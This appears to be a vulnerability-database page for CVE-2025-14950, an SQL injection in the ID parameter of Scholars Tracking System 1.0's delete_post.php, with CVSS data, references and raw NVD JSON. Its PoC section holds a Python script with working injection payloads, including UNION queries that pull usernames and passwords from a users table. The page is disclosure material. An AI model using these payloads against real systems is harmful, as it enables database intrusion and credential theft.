CVE-2025-14950

Description

A weakness has been identified in code-projects Scholars Tracking System 1.0. The affected element is an unknown function of the file /delete_post.php. This manipulation of the argument ID causes sql injection. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:fabian:scholars_tracking_system:1.0:*:*:*:*:*:*:* - VULNERABLE

Scholars Tracking System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-14950 SQL Injection PoC for Scholars Tracking System 1.0
# Target: /delete_post.php
# Parameter: ID

import requests
import sys

target_url = "http://target.com/delete_post.php"

# Basic SQL Injection test payload
def test_basic_injection():
    """Test basic SQL injection vulnerability"""
    params = {
        'id': "1' OR '1'='1"
    }
    response = requests.get(target_url, params=params)
    return response

# Union-based injection to extract database version
def extract_db_version():
    """Extract database version using union injection"""
    params = {
        'id': "1' UNION SELECT 1,version(),3,4,5-- -"
    }
    response = requests.get(target_url, params=params)
    return response.text

# Extract database name
def extract_db_name():
    """Extract current database name"""
    params = {
        'id': "1' UNION SELECT 1,database(),3,4,5-- -"
    }
    response = requests.get(target_url, params=params)
    return response.text

# Extract users table data
def extract_users():
    """Extract user credentials from database"""
    params = {
        'id': "1' UNION SELECT 1,username,password,4,5 FROM users-- -"
    }
    response = requests.get(target_url, params=params)
    return response.text

# Boolean-based blind injection for data extraction
def blind_injection_test():
    """Test blind SQL injection"""
    # True condition
    params_true = {
        'id': "1' AND 1=1-- -"
    }
    # False condition
    params_false = {
        'id': "1' AND 1=2-- -"
    }
    resp_true = requests.get(target_url, params=params_true)
    resp_false = requests.get(target_url, params=params_false)
    return resp_true, resp_false

if __name__ == "__main__":
    print("[+] CVE-2025-14950 SQL Injection PoC")
    print("[+] Target:", target_url)
    print("[*] Testing basic injection...")
    test_basic_injection()
    print("[+] Injection test completed")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14950
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14950
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14950/
[4] VulDB https://vuldb.com/cve/CVE-2025-14950
[5] https://code-projects.org/
[6] https://github.com/gx922/CVE/issues/2
[7] https://vuldb.com/?ctiid.337586
[8] https://vuldb.com/?id.337586
[9] https://vuldb.com/?submit.716123

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14950", "sourceIdentifier": "[email protected]", "published": "2025-12-19T14:15:50.583", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in code-projects Scholars Tracking System 1.0. The affected element is an unknown function of the file /delete_post.php. This manipulation of the argument ID causes sql injection. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:scholars_tracking_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "181B8F36-C4C5-4F67-AC1F-79162D790489"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/gx922/CVE/issues/2", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.337586", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.337586", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.716123", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}